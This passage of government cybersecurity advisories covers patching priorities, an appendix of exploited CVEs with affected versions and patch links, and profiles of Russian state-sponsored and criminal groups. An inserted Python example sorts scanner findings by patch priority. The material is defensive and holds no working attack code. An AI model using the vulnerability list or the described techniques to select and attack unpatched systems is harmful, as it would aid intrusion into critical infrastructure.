  • Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities, especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. 
    • If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.
  • Use a centralized patch management system.
  • Replace end-of-life software, i.e., software that is no longer supported by the vendor. For example, Accellion FTA was retired in April 2021.
  • Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications—such as webmail, file storage, file sharing, and chat and other employee collaboration tools—for their customers. However, as MSPs and CSPs expand their client organization's attack surface and may introduce unanticipated risks, organizations should proactively collaborate with their MSPs and CSPs to jointly reduce that risk. For more information and guidance, see the following resources.
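
The patching order given in the bullets above (CVEs named in this CSA first, then other known exploited vulnerabilities, then critical and high RCE or denial-of-service flaws on internet-facing equipment, with workarounds or replacement where no patch applies) can be applied to scanner output as a sort. The Python sketch below is an added example, not part of the advisory; the Finding fields, host names, scores, and placeholder IDs of the form CVE-0000-000N are constructed assumptions.

```python
from dataclasses import dataclass

# CVE IDs copied from Table 1 (top 15) and Table 2 (additional) of this advisory.
TOP_15 = frozenset("""
CVE-2021-44228 CVE-2021-40539 CVE-2021-34523 CVE-2021-34473 CVE-2021-31207
CVE-2021-27065 CVE-2021-26858 CVE-2021-26857 CVE-2021-26855 CVE-2021-26084
CVE-2021-21972 CVE-2020-1472 CVE-2020-0688 CVE-2019-11510 CVE-2018-13379
""".split())
ADDITIONAL = frozenset("""
CVE-2021-42237 CVE-2021-35464 CVE-2021-27104 CVE-2021-27103 CVE-2021-27102
CVE-2021-27101 CVE-2021-21985 CVE-2021-20038 CVE-2021-40444 CVE-2021-34527
CVE-2021-3156 CVE-2021-27852 CVE-2021-22893 CVE-2021-20016 CVE-2021-1675
CVE-2020-2509 CVE-2019-19781 CVE-2019-18935 CVE-2018-0171 CVE-2017-11882
CVE-2017-0199
""".split())


@dataclass(frozen=True)
class Finding:
    """One scanner finding; the field names are assumptions for this example."""
    host: str
    cve: str
    cvss: float                    # CVSS base score; 7.0 and above is high or critical
    impact: str                    # "rce", "dos", "privesc", "info", ...
    internet_facing: bool
    known_exploited: bool = False  # flagged by a known-exploited catalog
    patch_available: bool = True
    end_of_life: bool = False      # product no longer supported by its vendor


def tier(f: Finding) -> int:
    """Lower tier means patch sooner, following the order in the advisory."""
    if f.cve in TOP_15 or f.cve in ADDITIONAL:
        return 0                   # CVE identified in this CSA
    if f.known_exploited:
        return 1                   # other known exploited vulnerability
    if f.cvss >= 7.0 and f.impact in {"rce", "dos"} and f.internet_facing:
        return 2                   # critical/high RCE or DoS on internet-facing equipment
    return 3                       # everything else


def action(f: Finding) -> str:
    """Pick the remediation the advisory names for this situation."""
    if f.end_of_life:
        return "replace"           # end-of-life software gets replaced, not patched
    if f.patch_available:
        return "patch"
    return "workaround"            # vendor-approved workaround until a patch can be applied


def triage(findings):
    """Return (tier, host, cve, action) tuples in the order they should be worked."""
    ordered = sorted(
        findings,
        key=lambda f: (tier(f), not f.internet_facing, -f.cvss, f.host, f.cve),
    )
    return [(tier(f), f.host, f.cve, action(f)) for f in ordered]


# Constructed sample findings. Scores are sample values, not the CVEs' published
# scores, and the CVE-0000-* IDs are placeholders for CVEs not named in this CSA.
SAMPLE = [
    Finding("db03", "CVE-0000-0002", 9.8, "rce", internet_facing=False),
    Finding("vpn02", "CVE-0000-0001", 8.1, "dos", internet_facing=True,
            patch_available=False),
    Finding("build07", "CVE-2021-3156", 7.8, "privesc", internet_facing=False),
    Finding("web05", "CVE-0000-0003", 6.5, "info", internet_facing=True,
            known_exploited=True),
    Finding("mail01", "CVE-2021-26855", 9.0, "rce", internet_facing=True),
    Finding("files01", "CVE-2021-27104", 9.0, "rce", internet_facing=True,
            end_of_life=True),
]

if __name__ == "__main__":
    for t, host, cve, act in triage(SAMPLE):
        print(f"tier {t}  {host:<8} {cve:<15} {act}")
```

The internal database server with the highest score sorts last because the advisory's third priority applies only to internet-facing equipment.
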
Identity and Access Management
  • Enforce multifactor authentication (MFA) for all users, without exception.
  • Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords. 
  • Regularly review, validate, or remove privileged accounts (annually at a minimum).
  • Configure access control under the principle of least privilege.
    • Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (non-administrative privileges).

Note: see CISA Capacity Enhancement Guide – Implementing Strong Authentication and ACSC guidance on Implementing Multi-Factor Authentication for more information on hardening authentication systems.

Protective Controls and Architecture 
  • Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. 
    • Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.
    • Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.
    • Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).
  • Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks. 
  • Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware.
    • Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure your EDR, SIEM, vulnerability scanner etc., are reporting the same number of assets.
    • Monitor the environment for potentially unwanted programs.
  • Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions.
  • Implement application allowlisting. 
Resources

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, NSA, ACSC, CCCS, NZ NCSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

Purpose 

This document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

References

[1] CISA’s Apache Log4j Vulnerability Guidance

Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities

| CVE | Vendor | Affected Products | Patch Information | Resources |
|---|---|---|---|---|
| CVE-2021-42237 | Sitecore | Sitecore XP 7.5.0 - Sitecore XP 7.5.2; Sitecore XP 8.0.0 - Sitecore XP 8.2.7 | Sitecore Security Bulletin SC2021-003-499266 | ACSC Alert Active Exploitation of vulnerable Sitecore Experience Platform Content Management Systems |
| CVE-2021-35464 | ForgeRock | Access Management (AM) 5.x, 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3; OpenAM 9.x, 10.x, 11.x, 12.x and 13.x | ForgeRock AM Security Advisory #202104 | ACSC Advisory Active exploitation of ForgeRock Access Manager / OpenAM servers; CCCS ForgeRock Security Advisory |
| CVE-2021-27104 | Accellion | FTA 9_12_370 and earlier | Accellion Press Release: Update to Recent FTA Security Incident | Joint CSA Exploitation of Accellion File Transfer Appliance; ACSC Alert Potential Accellion File Transfer Appliance compromise |
| CVE-2021-27103 | Accellion | FTA 9_12_411 and earlier | | |
| CVE-2021-27102 | Accellion | FTA versions 9_12_411 and earlier | | |
| CVE-2021-27101 | Accellion | FTA 9_12_370 and earlier | | |
| CVE-2021-21985 | VMware | vCenter Server 7.0, 6.7, 6.5; Cloud Foundation (vCenter Server) 4.x and 3.x | VMware Advisory VMSA-2021-0010 | CCCS VMware Security Advisory |
| CVE-2021-21972 | VMware | vCenter Server 7.0, 6.7, 6.5; Cloud Foundation (vCenter Server) 4.x and 3.x | VMware Advisory VMSA-2021-0002 | ACSC Alert VMware vCenter Server plugin remote code execution vulnerability; CCCS VMware Security Advisory; CCCS Alert APT Actors Target U.S. and Allied Networks - Update 1 |
| CVE-2021-20038 | SonicWall | SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv | SonicWall Security Advisory SNWLID-2021-0026 | ACSC Alert Remote code execution vulnerability present in SonicWall SMA 100 series appliances; CCCS SonicWall Security Advisory |
| CVE-2021-44228 | Apache | Log4j, all versions from 2.0-beta9 to 2.14.1. For other affected vendors and products, see CISA's GitHub repository. | Log4j: Apache Log4j Security Vulnerabilities. For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities | CISA webpage Apache Log4j Vulnerability Guidance; CCCS Active exploitation of Apache Log4j vulnerability - Update 7 |
| CVE-2021-40539 | Zoho ManageEngine | ADSelfService Plus version 6113 and prior | Zoho ManageEngine: ADSelfService Plus 6114 Security Fix Release | Joint CSA APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus; CCCS Zoho Security Advisory |
| CVE-2021-40444 | Microsoft | Multiple Windows products; see Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444 | Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444 | |
| CVE-2021-34527 | Microsoft | Multiple Windows products; see Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527 | Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527 | Joint CSA Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability; CCCS Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3 |
| CVE-2021-34523 | Microsoft | Microsoft Exchange Server 2013 Cumulative Update 23; Microsoft Exchange Server 2016 Cumulative Updates 19 and 20; Microsoft Exchange Server 2019 Cumulative Updates 8 and 9 | Microsoft Security Update Guide: Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523 | Joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities; ACSC Alert Microsoft Exchange ProxyShell Targeting in Australia |
| CVE-2021-34473 | Microsoft | Multiple Exchange Server versions; see: Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473 | Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473 | |
| CVE-2021-31207 | Microsoft | Multiple Exchange Server versions; see Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207 | Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207 | |
| CVE-2021-3156 | Sudo | Sudo before 1.9.5p2 | Sudo Stable Release 1.9.5p2 | |
| CVE-2021-27852 | Checkbox Survey | Checkbox Survey versions prior to 7 | | |
| CVE-2021-27065 | Microsoft Exchange Server | Multiple versions; see: Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065 | Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities; ACSC Advisory Active exploitation of Vulnerable Microsoft Exchange servers; CCCS Alert Active Exploitation of Microsoft Exchange Vulnerabilities - Update 4 |
| CVE-2021-26858 | Microsoft | Exchange Server, multiple versions; see Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858 | Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858 | |
| CVE-2021-26857 | Microsoft | Exchange Server, multiple versions; see Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857 | Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857 | |
| CVE-2021-26855 | Microsoft | Exchange Server, multiple versions; see Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855 | Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855 | |
| CVE-2021-26084 | Jira Atlassian | Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. | Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084 | ACSC Alert Remote code execution vulnerability present in certain versions of Atlassian Confluence; CCCS Atlassian Security Advisory |
| CVE-2021-22893 | Pulse Secure | PCS 9.0R3/9.1R1 and Higher | Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4 | CCCS Alert Active Exploitation of Pulse Connect Secure Vulnerabilities - Update 1 |
| CVE-2021-20016 | SonicWall | SMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v) | SonicWall Security Advisory SNWLID-2021-0001 | |
| CVE-2021-1675 | Microsoft | Multiple Windows products; see Microsoft Security Update Guide Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675 | Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675 | CCCS Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3 |
| CVE-2020-2509 | QNAP | QTS, multiple versions; see QNAP: Command Injection Vulnerability in QTS and QuTS hero; QuTS hero h4.5.1.1491 build 20201119 and later | QNAP: Command Injection Vulnerability in QTS and QuTS hero | |
| CVE-2020-1472 | Microsoft | Windows Server, multiple versions; see Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472 | Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472 | ACSC Alert Netlogon elevation of privilege vulnerability (CVE-2020-1472); Joint CSA APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations; CCCS Alert Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1 |
| CVE-2020-0688 | Microsoft | Exchange Server, multiple versions; see Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688 | Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688 | CISA Alert Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity; Joint CSA Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology; CCCS Alert Microsoft Exchange Validation Key Remote Code Execution Vulnerability |
| CVE-2019-19781 | Citrix | ADC and Gateway version 13.0 all supported builds before 13.0.47.24; NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12; SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b | Citrix Security Bulletin CTX267027 | Joint CSA APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations; CISA Alert Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity; CCCS Alert Detecting Compromises relating to Citrix CVE-2019-19781 |
| CVE-2019-18935 | Progress Telerik | UI for ASP.NET AJAX through 2019.3.1023 | Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization | ACSC Alert Active exploitation of vulnerability in Microsoft Internet Information Services |
| CVE-2019-11510 | Pulse Secure | Pulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 | Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX | CISA Alert Continued Exploitation of Pulse Secure VPN Vulnerability; CISA Alert Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity; ACSC Advisory Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software; Joint CSA APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations; CCCS Alert APT Actors Target U.S. and Allied Networks - Update 1 |
| CVE-2018-13379 | Fortinet | FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 | Fortinet FortiGuard Labs: FG-IR-20-233 | Joint CSA Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology; Joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities; Joint CSA APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations; ACSC Alert APT exploitation of Fortinet Vulnerabilities; CCCS Alert Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1 |
| CVE-2018-0171 | Cisco | See Cisco Security Advisory: cisco-sa-20180328-smi2 | Cisco Security Advisory: cisco-sa-20180328-smi2 | CCCS Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature |
| CVE-2017-11882 | Microsoft | Office, multiple versions; see Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882 | Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882 | CCCS Alert Microsoft Office Security Update |
| CVE-2017-0199 | Microsoft | Multiple products; see Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199 | Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199 | CCCS Microsoft Security Updates |

Contact Information

U.S. organizations: all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov. Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca. New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654. United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Revisions
  • April 27, 2022: Initial Version


AA22-110A: Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure

US-CERT Security Alerts - Wed, 04/20/2022 - 09:00
Original release date: April 20, 2022 | Last revised: May 9, 2022
Summary

Actions critical infrastructure organizations should implement to immediately protect against Russian state-sponsored and criminal cyber threats:
• Patch all systems. Prioritize patching known exploited vulnerabilities.
• Enforce multifactor authentication.
• Secure and monitor Remote Desktop Protocol and other risky services.
• Provide end-user awareness and training.

The cybersecurity authorities of the United States[1][2][3], Australia[4], Canada[5], New Zealand[6], and the United Kingdom[7][8] are releasing this joint Cybersecurity Advisory (CSA). The intent of this joint CSA is to warn organizations that Russia’s invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. This activity may occur as a response to the unprecedented economic costs imposed on Russia as well as materiel support provided by the United States and U.S. allies and partners.

Evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks (see the March 21, 2022, Statement by U.S. President Biden for more information). Recent Russian state-sponsored cyber operations have included distributed denial-of-service (DDoS) attacks, and older operations have included deployment of destructive malware against Ukrainian government and critical infrastructure organizations.

Additionally, some cybercrime groups have recently publicly pledged support for the Russian government. These Russian-aligned cybercrime groups have threatened to conduct cyber operations in retaliation for perceived cyber offensives against the Russian government or the Russian people. Some groups have also threatened to conduct cyber operations against countries and organizations providing materiel support to Ukraine. Other cybercrime groups have recently conducted disruptive attacks against Ukrainian websites, likely in support of the Russian military offensive.

This advisory updates joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure, which provides an overview of Russian state-sponsored cyber operations and commonly observed tactics, techniques, and procedures (TTPs). This CSA—coauthored by U.S., Australian, Canadian, New Zealand, and UK cyber authorities with contributions from industry members of the Joint Cyber Defense Collaborative (JCDC)—provides an overview of Russian state-sponsored advanced persistent threat (APT) groups, Russian-aligned cyber threat groups, and Russian-aligned cybercrime groups to help the cybersecurity community protect against possible cyber threats.

U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities urge critical infrastructure network defenders to prepare for and mitigate potential cyber threats—including destructive malware, ransomware, DDoS attacks, and cyber espionage—by hardening their cyber defenses and performing due diligence in identifying indicators of malicious activity. Refer to the Mitigations section of this advisory for recommended hardening actions.

For more information on Russian state-sponsored cyber activity, see CISA’s Russia Cyber Threat Overview and Advisories webpage. For more information on the heightened cyber threat to critical infrastructure organizations, see the following resources:


Technical Details

Russian State-Sponsored Cyber Operations

Russian state-sponsored cyber actors have demonstrated capabilities to compromise IT networks; develop mechanisms to maintain long-term, persistent access to IT networks; exfiltrate sensitive data from IT and operational technology (OT) networks; and disrupt critical industrial control systems (ICS)/OT functions by deploying destructive malware.

Historical operations have included deployment of destructive malware—including BlackEnergy and NotPetya—against Ukrainian government and critical infrastructure organizations. Recent Russian state-sponsored cyber operations have included DDoS attacks against Ukrainian organizations. Note: for more information on Russian state-sponsored cyber activity, including known TTPs, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure.

Cyber threat actors from the following Russian government and military organizations have conducted malicious cyber operations against IT and/or OT networks:

  • The Russian Federal Security Service (FSB), including FSB’s Center 16 and Center 18
  • Russian Foreign Intelligence Service (SVR)
  • Russian General Staff Main Intelligence Directorate (GRU), 85th Main Special Service Center (GTsSS)
  • GRU’s Main Center for Special Technologies (GTsST)
  • Russian Ministry of Defense, Central Scientific Institute of Chemistry and Mechanics (TsNIIKhM)
The Russian Federal Security Service

Overview: FSB, the KGB’s successor agency, has conducted malicious cyber operations targeting the Energy Sector, including UK and U.S. energy companies, U.S. aviation organizations, U.S. government and military personnel, private organizations, cybersecurity companies, and journalists. FSB has been known to task criminal hackers for espionage-focused cyber activity; these same hackers have separately been responsible for disruptive ransomware and phishing campaigns.

Industry reporting identifies three intrusion sets associated with the FSB, but the U.S. and UK governments have only formally attributed one of these sets—known as BERSERK BEAR—to FSB.

  • BERSERK BEAR (also known as Crouching Yeti, Dragonfly, Energetic Bear, and Temp.Isotope) has, according to industry reporting, historically targeted entities in Western Europe and North America including state, local, tribal, and territorial (SLTT) organizations, as well as Energy, Transportation Systems, and Defense Industrial Base (DIB) Sector organizations. This group has also targeted the Water and Wastewater Systems Sector and other critical infrastructure facilities. Common TTPs include scanning to exploit internet-facing infrastructure and network appliances, conducting brute force attacks against public-facing web applications, and leveraging compromised infrastructure—often websites frequented or owned by their target—for Windows New Technology Local Area Network Manager (NTLM) credential theft. Industry reporting assesses that this actor has a destructive mandate.

The U.S. and UK governments assess that this APT group is almost certainly FSB’s Center 16, or Military Unit 71330, and that FSB’s Center 16 has conducted cyber operations against critical IT systems and infrastructure in Europe, the Americas, and Asia. 

Resources: for more information on BERSERK BEAR, see the MITRE ATT&CK® webpage on Dragonfly.

High-Profile Activity: in 2017, FSB employees, including one employee in the FSB Center for Information Security (also known as Unit 64829 and Center 18), were indicted by the U.S. Department of Justice (DOJ) for accessing email accounts of U.S. government and military personnel, private organizations, and cybersecurity companies, as well as email accounts of journalists critical of the Russian government.[9] More recently, in 2021, FSB Center 16 officers were indicted by the U.S. DOJ for their involvement in a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data. One of the victims was a U.S. nuclear power plant.[10]

Resources: for more information on FSB, see: 

Russian Foreign Intelligence Service

Overview: SVR has operated an APT group since at least 2008 that has targeted multiple critical infrastructure organizations. SVR cyber threat actors have used a range of initial exploitation techniques that vary in sophistication coupled with stealthy intrusion tradecraft within compromised networks. SVR cyber actors’ novel tooling and techniques include:

  • Custom, sophisticated multi-platform malware targeting Windows and Linux systems (e.g., GoldMax and TrailBlazer); and
  • Lateral movement via the “credential hopping” technique, which includes browser cookie theft to bypass multifactor authentication (MFA) on privileged cloud accounts.[11]

High-Profile Activity: the U.S. Government, the Government of Canada, and the UK Government assess that SVR cyber threat actors were responsible for the SolarWinds Orion supply chain compromise and the associated campaign that affected U.S. government agencies, critical infrastructure entities, and private sector organizations.[12][13][14]

Also known as: APT29, COZY BEAR, CozyDuke, Dark Halo, The Dukes, NOBELIUM, NobleBaron, StellarParticle, UNC2452, and YTTRIUM [15]

Resources: for more information on SVR, see:

For more information on the SolarWinds Orion supply chain compromise, see:

GRU, 85th Main Special Service Center

Overview: GTsSS, or Unit 26165, is an APT group that has operated since at least 2004 and primarily targets government organizations, travel and hospitality entities, research institutions, and non-governmental organizations, in addition to other critical infrastructure organizations. 

According to industry reporting, GTsSS cyber actors frequently collect credentials to gain initial access to target organizations. GTsSS actors have collected victim credentials by sending spearphishing emails that appear to be legitimate security alerts from the victim’s email provider and include hyperlinks leading to spoofed popular webmail services’ logon pages. GTsSS actors have also registered domains to conduct credential harvesting operations. These domains mimic popular international social media platforms and masquerade as tourism- and sports-related entities and music and video streaming services.

High-Profile Activity: the U.S. Government assesses that GTsSS cyber actors have deployed Drovorub malware against victim devices as part of their cyber espionage operations.[16] The U.S. Government and UK Government assess that GTsSS actors used a Kubernetes® cluster to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide.[17]

Also known as: APT28, FANCY BEAR, Group 74, IRON TWILIGHT, PawnStorm, Sednit, SNAKEMACKEREL, Sofacy, STRONTIUM, Swallowtail, TG-4127, Threat Group-4127, and Tsar Team [18]

Resources: for more information on GTsSS, see the MITRE ATT&CK webpage on APT28.

GRU’s Main Center of Special Technologies

Overview: GTsST, or Unit 74455, is an APT group that has operated since at least 2009 and has targeted a variety of critical infrastructure organizations, including those in the Energy, Transportation Systems, and Financial Services Sectors. According to industry reporting, GTsST also has an extensive history of conducting cyber espionage as well as destructive and disruptive operations against NATO member states, Western government and military organizations, and critical infrastructure-related organizations, including in the Energy Sector.

The group’s primary distinguishing characteristic is that its operations use techniques aimed at causing disruptive or destructive effects at targeted organizations using DDoS attacks or wiper malware. The group’s destructive operations have also leveraged wiper malware that mimics ransomware or hacktivism and can result in collateral effects to organizations beyond the primary intended targets. Some of their disruptive operations have shown disregard or ignorance of potential secondary or tertiary effects.

High-Profile Activity: the malicious activity below has been previously attributed to GTsST by the U.S. Government and the UK Government.[19][20]

The U.S. Government, the Government of Canada, and UK Government have also attributed the October 2019 large-scale, disruptive cyber operations against a range of Georgian web hosting providers to GTsST. This activity resulted in websites—including sites belonging to the Georgian government, courts, non-government organizations (NGOs), media, and businesses—being defaced and interrupted the service of several national broadcasters.[21][22][23]

Also known as: ELECTRUM, IRON VIKING, Quedagh, the Sandworm Team, Telebots, VOODOO BEAR [24]

Resources: for more information on GTsST, see the MITRE ATT&CK webpage on Sandworm Team.

Russian Ministry of Defense, Central Scientific Institute of Chemistry and Mechanics 

Overview: TsNIIKhM, as described on their webpage, is a research organization under Russia’s Ministry of Defense (MOD). Actors associated with TsNIIKhM have developed destructive ICS malware.

High-Profile Activity: TsNIIKhM has been sanctioned by the U.S. Department of the Treasury for connections to the destructive Triton malware (also called HatMan and TRISIS); TsNIIKhM has been sanctioned by the UK Foreign, Commonwealth, and Development Office (FCDO) for a 2017 incident that involved safety override controls (with Triton malware) in a foreign oil refinery.[25][26] In 2021, the U.S. DOJ indicted a TsNIIKhM Applied Development Center (ADC) employee for conducting computer intrusions against U.S. Energy Sector organizations. The indicted employee also accessed the systems of a foreign oil refinery and deployed Triton malware.[27] Triton is a custom-built malware designed to manipulate safety instrumented systems within ICS controllers, disabling the safety alarms that prevent dangerous conditions. 

Also known as: Temp.Veles, XENOTIME [28]

Resources: for more information on TsNIIKhM, see the MITRE ATT&CK webpage on TEMP.Veles. For more information on Triton, see:

Russian-Aligned Cyber Threat Groups

In addition to the APT groups identified in the Russian State-Sponsored Cyber Operations section, industry reporting identifies two intrusion sets—PRIMITIVE BEAR and VENOMOUS BEAR—as state-sponsored APT groups, but U.S., Australian, Canadian, New Zealand, and UK cyber authorities have not attributed these groups to the Russian government.

  • PRIMITIVE BEAR has, according to industry reporting, targeted Ukrainian organizations since at least 2013. This activity includes targeting Ukrainian government, military, and law enforcement entities using high-volume spearphishing campaigns to deliver its custom malware. According to industry reporting, PRIMITIVE BEAR conducted multiple cyber operations targeting Ukrainian organizations in the lead up to Russia’s invasion.

Resources: for more information on PRIMITIVE BEAR, see the MITRE ATT&CK webpage on the Gamaredon Group.

  • VENOMOUS BEAR has, according to industry reporting, historically targeted governments aligned with the North Atlantic Treaty Organization (NATO), defense contractors, and other organizations of intelligence value. VENOMOUS BEAR is known for its unique use of hijacked satellite internet connections for command and control (C2). It is also known for the hijacking of other non-Russian state-sponsored APT actor infrastructure.[29] VENOMOUS BEAR has also historically leveraged compromised infrastructure and maintained an arsenal of custom-developed sophisticated malware families, which is extremely complex and interoperable with variants developed over time. VENOMOUS BEAR has developed tools for multiple platforms, including Windows, Mac, and Linux.[30]

Resources: for more information on VENOMOUS BEAR, see the MITRE ATT&CK webpage on Turla.

Russian-Aligned Cybercrime Groups

Cybercrime groups are typically financially motivated cyber actors that seek to exploit human or security vulnerabilities to enable direct theft of money (e.g., by obtaining bank login information) or by extorting money from victims. These groups pose consistent threats to critical infrastructure organizations globally. 

